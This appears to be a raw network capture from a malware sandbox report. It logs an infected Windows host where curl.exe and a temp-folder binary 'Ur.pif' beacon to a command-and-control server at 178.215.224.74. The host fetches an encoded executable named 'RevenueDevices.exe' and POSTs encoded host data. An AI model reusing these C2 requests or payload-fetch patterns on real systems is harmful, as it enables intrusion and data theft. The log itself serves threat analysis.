                                        Nov 21, 2024 20:00:21.906269073 CET1236INData Raw: 31 67 34 56 45 39 79 66 54 52 47 65 6b 31 68 62 31 68 62 55 48 46 35 64 6a 68 77 61 55 51 34 61 57 6c 74 64 30 4a 56 4d 30 5a 4f 4e 7a 6c 49 61 45 39 4c 56 57 46 55 57 58 56 4c 51 55 52 43 63 46 63 33 55 48 64 67 59 6c 46 4c 64 46 51 36 59 57 74
                                        Data Ascii: 1g4VE9yfTRGek1hb1hbUHF5djhwaUQ4aWltd0JVM0ZONzlIaE9LVWFUWXVLQURCcFc3UHdgYlFLdFQ6YWtmcEtIUlc0Qm1DSmZqO2tDa2VER0tybjNVM2tPVXdQOVVFT1svdUkxO0N5VjdWNVI4bjhEeFMwUTVHVkswZU06WEUvT2lDUlpNUVJZOGhyeFZAdytra1w3cHlVNFJVL0R2aDhhZGp1R01ha0llZGx1Mk5kaFUvayl6


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.449854178.215.224.74802336C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:26.193878889 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:27.456290960 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449859178.215.224.74806192C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:27.837408066 CET98OUTGET /v10/ukyh.php?jspo=31 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:29.194426060 CET230INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 30
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45
                                        Data Ascii: 9A5605DE11447A0E2031624EE8FBDE


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449870178.215.224.74806264C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:32.550404072 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:33.851232052 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449874178.215.224.74802476C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:34.071444988 CET919OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 625
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 70 74 5a 6d 31 78 58 6b 46 79 63 45 52 68 64 47 46 63 55 47 64 6a 62 57 6c 75 5a 56 35 45 62 32 35 77 61 47 6c 73 52 48 31 74 63 6e 46 63 4d 6a 73 79 4d 6a 4a 48 4d 6a 49 76 4d 6b 4d 77 4d 43 38 38 4e 7a 45 7a 4a 54 51 78 53 6a 6c 5a 51 6c 38 7a 4d 6a 49 71 4d 7a 67 34 4f 7a 45 71 64 57 6c 75 5a 47 39 33 63 79 4a 73 5a 32 5a 6c 62 6d 5a 6e 63 6c 74 43 58 54 45 77 4d 69 6f 35 4d 44 49 7a 4d 43 6f 7a 4e 7a 6f 73 4d 44 45 33 4c 44 41 79 4e 43 34 77 50 54 42 62 51 46 55 7a 4d 6a 67 71 4d 7a 49 79 4d 7a 41 6f 4d 54 55 77 4a 6a 41 7a 4e 53 77 79 4d 6a 51 75 4e 7a 52 5a 53 46 38 78 4d 44 41 6f 4d 7a 41 77 4d 7a 45 71 4d 54 55 34 4a 6a 49 7a 4e 79 34 79 4d 44 51 73 4e 54 5a 62 51 6c 38 77 4b 6a 49 77 4e 79 4a 42 4f 6c 78 64 63 57 64 36 63 31 35 6f 62 57 78 6e 63 56 78 44 65 48 68 47 59 [TRUNCATED]
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmptZm1xXkFycERhdGFcUGdjbWluZV5Eb25waGlsRH1tcnFcMjsyMjJHMjIvMkMwMC88NzEzJTQxSjlZQl8zMjIqMzg4OzEqdWluZG93cyJsZ2ZlbmZncltCXTEwMio5MDIzMCozNzosMDE3LDAyNC4wPTBbQFUzMjgqMzIyMzAoMTUwJjAzNSwyMjQuNzRZSF8xMDAoMzAwMzEqMTU4JjIzNy4yMDQsNTZbQl8wKjIwNyJBOlxdcWd6c15obWxncVxDeHhGY3RjXFJvYW1pbG9eRG9scmppbkZ1bXBxXGl6dHUuZXplWUJfMTIyKDEwMDM5KDE3MCwwOTUsMDA2LDU0WUhVMCgyMjUqQzpcVXFtcHNcam1sZXNeQXBwRmF8YV5Qb2FvaWxlXkRtbnJoaW5GfW9wc1R6an9xLHhrcllCXTM4OCgzMDMyMypDOlxXe2dyc1xobW5lcVxBcHJEaXRjXlJvY21rbGVcRm1ucGhpbEx3bXB7Xnpgd3MseGtyWUBfOTgyKDEyMDExKjE3OiYwMTUuMDA0LjU0W0Bf
                                        Nov 21, 2024 20:00:35.392931938 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:35 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449878178.215.224.74805828C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:35.630002975 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:36.887707949 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.449884178.215.224.74805172C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:37.458591938 CET97OUTGET /v10/ukyh.php?jspo=7 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:38.762130976 CET299INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 76
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 57 30 42 64 57 55 68 66 57 30 42 56 57 55 4a 56 5a 6d 4e 75 63 57 64 5a 51 6c 31 6b 61 57 52 78 5a 31 74 43 58 56 4a 6c 64 6d 56 75 64 32 31 47 5a 58 5a 70 59 57 64 7a 4c 6d 64 34 5a 53 6f 7a 57 30 68 64 4d 7a 49 71 57 30 4a 64
                                        Data Ascii: W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.449889178.215.224.74804476C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:39.184595108 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:40.498481035 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:40 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.449893178.215.224.7480772C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:40.852935076 CET105OUTGET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:42.165889025 CET328INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 104
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 55 6d 56 32 5a 32 5a 33 5a 55 52 74 64 47 74 72 5a 58 45 73 5a 33 70 6e 4b 46 4a 6e 66 6d 31 73 64 32 56 47 5a 58 5a 70 59 32 56 7a 4c 47 31 36 5a 53 6f 32 4b 44 4d 71 4b 6d 41 30 4f 44 64 67 4e 57 6f 31 4d 7a 59 7a 4e 6d 41 30 4d 44 63 31 4e 6d 59 30 4d 6d 45 78 5a 6d 63 39 4f 6d 59 34 4f 7a 73 37 49 6a 41 3d
                                        Data Ascii: UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.449897178.215.224.74804280C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:42.757563114 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:44.111241102 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.449903178.215.224.74806696C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:44.447386026 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:45.808995008 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.449909178.215.224.74801508C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:46.195420980 CET128OUTGET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:47.715118885 CET1236INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 66 33 66 65 63 0d 0a 56 46 5a 78 55 30 6c 44 54 55 46 4a 51 30 4e 4e 51 55 4e 44 51 79 30 74 4f 6b 46 44 52 47 39 44 51 30 46 44 51 55 46 42 51 55 46 52 51 30 6c 44 51 55 46 42 51 30 4e 42 51 55 4e 42 51 55 46 44 51 55 6c 42 51 30 4e 42 51 55 4e 42 51 30 4e 44 51 55 4e 44 51 30 46 42 51 55 4e 4a 51 30 46 42 53 55 4e 44 53 55 46 44 51 30 4d 79 51 30 4e 42 51 30 6b 38 5a 48 64 6e 4e 6b 46 30 51 57 35 4f 53 57 42 76 51 46 52 4e 4d 47 70 55 52 32 68 79 59 33 6c 43 64 57 4e 6c 4f 57 78 68 62 55 5a 32 53 55 56 4d 61 6d 4a 76 4e 33 52 6b 51 30 4a 72 55 6c 46 43 65 57 78 56 4e 6d 39 68 56 54 5a 6c 55 45 63 37 56 45 74 50 4f 58 52 59 52 31 64 31 52 46 45 77 53 30 70 44 53 55 4e 42 51 55 46 44 51 30 46 43 51 47 55 35 52 6e 42 43 57 6e 45 74 54 55 46 56 59 33 5a 34 5a 55 52 48 63 44 6f 32 52 45 64 4a 4f 6b 64 44 57 57 46 2b 65 47 56 46 57 57 74 31 4e 6b 52 41 63 79 39 4e 53 56 31 6a 64 47 70 72 63 45 64 79 4f 44 52 49 62 57 74 55 54 30 46 72 59 33 52 36 5a 32 64 6f 65 56 55 32 51 6b 70 78 4c 55 31 43 4e 6b [TRUNCATED]
                                        Data Ascii: 1f3fecVFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0MyQ0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FCQGU5RnBCWnEtTUFVY3Z4ZURHcDo2REdJOkdDWWF+eGVFWWt1NkRAcy9NSV1jdGprcEdyODRIbWtUT0FrY3R6Z2doeVU2QkpxLU1CNkpJaGVHR3A6NlVtbGhpQ1VhfnhlSUFDQ0NDQ0NBQ05KRENBQE1BUVlBMndCSlR3QUNDQUFDQUFBQzRJQUFDUXNAQ2VDQ2JlQ0NBRllKSUNCQ0lDQUxPQ0NDQ0BDQUNJS0NDQUNBQUVBQUFASUNBQUFBQ0FBREFBQUNCb0FDQ0FVQ0FDQ0NBQ0NDQVBBUklDQUVJQ0Z8Z0BLQ0NlQEFqWUlDR0FDQUVBQUFBQ0lTQUFBU0NBQUNBQUFDRUlBQ0NBQUNBQ0NDQUNDQ05Kc0NJTlFBSUNDSVFDOkNhckdBQ0lJQ0NBQ0FBQUFBakpFUEFHZ21DQUFDb0FjQ1pJa0NDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FDQ0FDRlNBZUNDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFMbFpuZUhRQ0NBQ3diUUFDQUpBQ0NBQndBQ0NDQkNDQ0FBQUNJQ0FBSUNDSUFDQ0NLQ0NBW0s9e1hHRDBZUUFBWWtnQ0FBQ0NDQUFDTEFBQ0FASUNDQUFDQUNDQ0FDQ0NBQUFDSUdBQUlHQ31aRUQyW1NDQUNEcClAZ0NBc0FBQUFDQUNBQUNnQ0FBQ
                                        Nov 21, 2024 20:00:47.715156078 CET1236INData Raw: 30 46 42 51 55 4e 42 53 55 46 44 51 30 46 42 51 30 46 44 51 45 4e 42 51 30 5a 44 54 47 30 31 61 56 46 61 55 6d 68 4a 51 30 4e 4a 52 55 4e 6c 51 30 4e 47 51 30 68 44 53 55 6c 44 51 30 46 44 51 55 46 42 51 55 46 42 51 30 6c 44 51 55 46 42 51 30 4e
                                        Data Ascii: 0FBQUNBSUFDQ0FBQ0FDQENBQ0ZDTG01aVFaUmhJQ0NJRUNlQ0NGQ0hDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDZ0lBQ3VDNXtjMUhoQUNDQ2NwRUNJQ0JBTHVDSWtlQ0NDSUNBQ0lJQ0NBQ0FBQUFBQUNJQ0FFQUNDRUF3Y21WcWI6TUNDRElSQUNDQzRDOkNBQkFDSUNBNklTQ0lBQ0NDQ0NDQUNJSUNDQUBBQUFCQ0FD
                                        Nov 21, 2024 20:00:47.715169907 CET1236INData Raw: 6d 4e 56 55 6a 73 7a 52 6c 49 36 56 6d 39 42 51 6b 4e 44 55 44 73 78 52 6c 41 76 56 47 63 79 55 47 31 43 52 47 77 37 4e 45 45 72 54 32 4a 32 4c 79 30 76 50 45 34 70 56 56 41 35 4d 6c 70 6b 4f 7a 42 4f 55 6a 70 55 56 45 6c 43 51 30 6c 4c 62 45 5a
                                        Data Ascii: mNVUjszRlI6Vm9BQkNDUDsxRlAvVGcyUG1CRGw7NEErT2J2Ly0vPE4pVVA5MlpkOzBOUjpUVElCQ0lLbEZOS1pJZERVTmRTenFDXm5KUGVTUUFBQUF4MlBtQ0FBQ0NQOFRVSUJDQVg5MFVGZi1GVFFDUUNGLWRSU05GVGlBWUNAUC87WG1LQ2VBQ0FkREZJM0Y1RkJxLzBiQ3JVWUNULzhUbklKQ0FYOTNGRmYtMXQ7M0ZSLVZq
                                        Nov 21, 2024 20:00:47.715235949 CET1236INData Raw: 31 46 70 51 30 39 30 62 57 6b 77 57 6e 42 31 51 6e 64 47 51 6d 52 44 64 6c 4a 31 51 55 5a 50 51 55 59 79 55 45 52 45 62 7a 31 6c 52 30 6c 42 52 6a 45 74 4c 53 30 37 4c 32 5a 4f 58 6c 4d 30 54 47 51 76 4c 79 38 72 52 6e 64 4b 58 55 64 52 52 57 4a
                                        Data Ascii: 1FpQ090bWkwWnB1QndGQmRDdlJ1QUZPQUYyUEREbz1lR0lBRjEtLS07L2ZOXlM0TGQvLy8rRndKXUdRRWJwQDBpTnpvdnVLMEdGZENRT0FKU3RBU1VxclVZQ2llRC9GY1F8UmVAbU9KV0FDWDAzcEszR0FQOFZVS05DQUZCbUNnUUNBUDkySkpqLURZaUFRQ0FEOWxvV004Qmd/ZWdBfVItJy8xLXA7W3ZFSElbTkZkdXRSd0Jx
                                        Nov 21, 2024 20:00:47.715245962 CET1236INData Raw: 6c 70 47 4a 31 5a 76 61 30 4e 6f 4d 6b 4e 42 4e 45 77 78 54 30 4e 42 51 46 70 58 56 6b 35 58 4e 6b 5a 4d 4f 79 38 76 4c 33 4a 6b 51 6d 39 44 51 55 5a 51 62 54 56 59 4d 79 30 74 4d 55 4a 74 57 55 73 37 51 30 46 4e 5a 57 56 55 51 55 46 44 58 31 52
                                        Data Ascii: lpGJ1Zva0NoMkNBNEwxT0NBQFpXVk5XNkZMOy8vL3JkQm9DQUZQbTVYMy0tMUJtWUs7Q0FNZWVUQUFDX1RsVCcxWl02TVM2Q0NGcFdKZ0NDRFJKNkt6OS8tI044RlptVkk5Q0FPajpTf0FDVVZtRi9lRC1BeFIwUmxiLU5beUFZQ0Z4SmptQ0NFZXdoOElDNE56TEFBQlovMVAyL3hWQ2VrQUM2UTBjQUlDTnVqbGYzSlduaXV7
                                        Nov 21, 2024 20:00:47.715259075 CET1236INData Raw: 32 70 6a 51 6a 4a 45 52 32 70 54 4f 45 31 42 51 32 4e 31 55 48 4a 68 4c 54 45 74 4c 33 68 75 5a 6a 4e 49 55 57 78 65 64 32 6c 7a 57 31 4e 44 53 57 68 68 51 44 4a 4b 5a 44 73 78 51 55 35 71 62 55 39 73 54 30 46 42 52 32 70 52 4f 45 64 4a 51 32 46
                                        Data Ascii: 2pjQjJER2pTOE1BQ2N1UHJhLTEtL3huZjNIUWxed2lzW1NDSWhhQDJKZDsxQU5qbU9sT0FBR2pROEdJQ2F1VG1PRFlDQUZkbWNBeENDT3NMVjBqT2pHQ0N4MFg6SVNBQUlNakBTU0NDVWduSi1+Jy1XK2gwK3YvL2ktS0xSUWhTVDJnR0lBQUNWfjhUYUlCQ0FLWkNkQVFOUlFnNXBsWXBSaGlRZEFQVTRHUEpDSUk1dTNTT2c4
                                        Nov 21, 2024 20:00:47.715390921 CET1236INData Raw: 55 45 6e 64 54 41 34 54 47 6c 68 51 32 73 74 61 6c 64 55 4f 6d 46 50 61 32 74 44 51 54 5a 4e 62 45 64 42 51 30 74 47 65 45 46 35 52 6d 52 6c 52 43 31 6b 55 57 46 47 5a 6d 31 55 4c 57 5a 42 4b 30 78 53 5a 30 42 54 56 54 4e 47 4c 57 52 6d 61 69 31
                                        Data Ascii: UEndTA4TGlhQ2staldUOmFPa2tDQTZNbEdBQ0tGeEF5RmRlRC1kUWFGZm1ULWZBK0xSZ0BTVTNGLWRmai1OVUNBWUNGJ2RkaC1EYHtBU0lJNSl3KU4yaFFBQUtYLS9uVVZjdWxVNk85TkFJRC1mY3hVNkNYR0FDRnBDR3J3XndqY1t1Q0lWb2tHa2lDQTRPMUVDQUBaV1dnUUFBSUNWdWhkU0FBQzZlejcvJzlWNEJENi8tKU44
                                        Nov 21, 2024 20:00:47.715434074 CET1236INData Raw: 6b 31 34 4c 53 74 7a 56 6b 38 34 64 44 4a 34 55 58 5a 4b 62 32 5a 6d 4e 32 6b 74 63 48 42 43 64 6c 4a 73 4e 6e 64 4d 56 69 63 7a 5a 6e 42 5a 65 6b 74 4a 51 55 56 74 51 44 52 4f 64 44 45 74 4a 7a 46 7a 51 32 78 76 54 43 74 50 61 57 49 35 5a 43 63
                                        Data Ascii: k14LStzVk84dDJ4UXZKb2ZmN2ktcHBCdlJsNndMViczZnBZektJQUVtQDROdDEtJzFzQ2xvTCtPaWI5ZCctVUZkVS14Vktna0FDNmxMOi0vK05SZntOUGFBdVFBQTV/MVJlW0Z0P2RDc05SeHREZm5dNSkzV2kvM1hjYVJbSFFBRG11VU1DQUZsWGFKQUNLQUJzNkRSbUZHaUNBRkRyWmQzLyc2UkBCRGcpe05AQUNOam1DMEdB
                                        Nov 21, 2024 20:00:47.715445995 CET1236INData Raw: 55 74 77 52 6a 31 4c 63 45 46 6e 54 55 64 41 61 30 4d 79 52 54 70 64 54 55 4e 72 63 32 74 42 4e 46 46 4a 61 30 4a 46 62 30 38 34 56 55 56 44 61 30 45 77 52 44 68 56 52 55 4e 76 62 32 4a 36 55 31 46 45 52 55 4a 54 5a 48 70 52 55 30 4e 41 4e 6b 74
                                        Data Ascii: UtwRj1LcEFnTUdAa0MyRTpdTUNrc2tBNFFJa0JFb084VUVDa0EwRDhVRUNvb2J6U1FERUJTZHpRU0NANktCRUlDQm8wUkBKQVI6VFZLQEFDR2RsRndDQU04bm95dEQtL3pQSFNZdnU2TUR7LycrTilEbGYzSlNOYU5rSFFBRG1MR0VBSURuUFZobmY2SldMLXBeR2VrQ0E2VGtQQUNMLUZZQ0FTQURyTGc4Q0FOUG1tZkwtLzBt
                                        Nov 21, 2024 20:00:47.715456963 CET1236INData Raw: 7a 5a 61 59 6a 45 74 4c 79 39 4b 55 6d 5a 33 51 45 46 4a 51 55 4e 4e 55 6a 49 32 54 47 6c 68 51 30 51 32 65 47 74 42 51 55 46 44 61 58 52 45 62 31 31 30 52 69 63 76 4d 47 31 41 61 79 31 6f 62 31 46 75 54 43 30 74 4e 47 35 47 4b 30 52 73 5a 44 56
                                        Data Ascii: zZaYjEtLy9KUmZ3QEFJQUNNUjI2TGlhQ0Q2eGtBQUFDaXREb110RicvMG1Aay1ob1FuTC0tNG5GK0RsZDVKWU1WLzhUTElGQ0FJbERDTHZGZlJWc0NETFovelc2Z1VBQ2FXVUlHOk9YaEhDQ0NDRi9mbmItZlFob0hEOEFBS351Ty9OMlJZbGYvRGxmM0BRWi0zWGE2TGB0Ly0tLTFvWENsR0xIWmR1SkFDQ0M0eG5vQ0RKQ0NH
                                        Nov 21, 2024 20:00:47.836260080 CET1236INData Raw: 48 59 77 4c 53 38 76 59 54 4a 61 4f 46 5a 74 62 6b 52 79 54 32 5a 47 63 30 6c 42 51 30 4e 42 52 6d 39 61 61 6d 74 42 51 55 5a 59 53 46 59 79 59 55 68 57 52 56 6c 42 4e 6b 5a 72 4e 30 46 4a 51 58 68 37 56 32 46 49 56 45 64 68 51 57 6b 79 56 30 74
                                        Data Ascii: HYwLS8vYTJaOFZtbkRyT2ZGc0lBQ0NBRm9aamtBQUZYSFYyYUhWRVlBNkZrN0FJQXh7V2FIVEdhQWkyV0tab3RMO0RCVGFaVXtpWjB1a1dVK1hnZEx2T2tLS0FBQWpXX2lVUDhUaElGQ0FJWENEPFRyQVFBQzY3MEArZTF1clFzUmBmejMnLS0nQlhTd1B1RnAySWNDQ0doZ2hVQUF2dkx1UUFCVWtWM3VpVjNxaV4wSzROMDZB


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.449925178.215.224.74801696C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:54.483695030 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:55.794033051 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.449930178.215.224.74805632C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:56.286088943 CET93OUTGET /v10/ukyh.php?gi HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:57.611834049 CET211INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 11
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                        Data Ascii: 8.46.123.75


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.449936178.215.224.7480428C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:58.415659904 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:59.779395103 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:59 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.449941178.215.224.74802476C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:00.217163086 CET531OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 237
                                        Cache-Control: no-cache
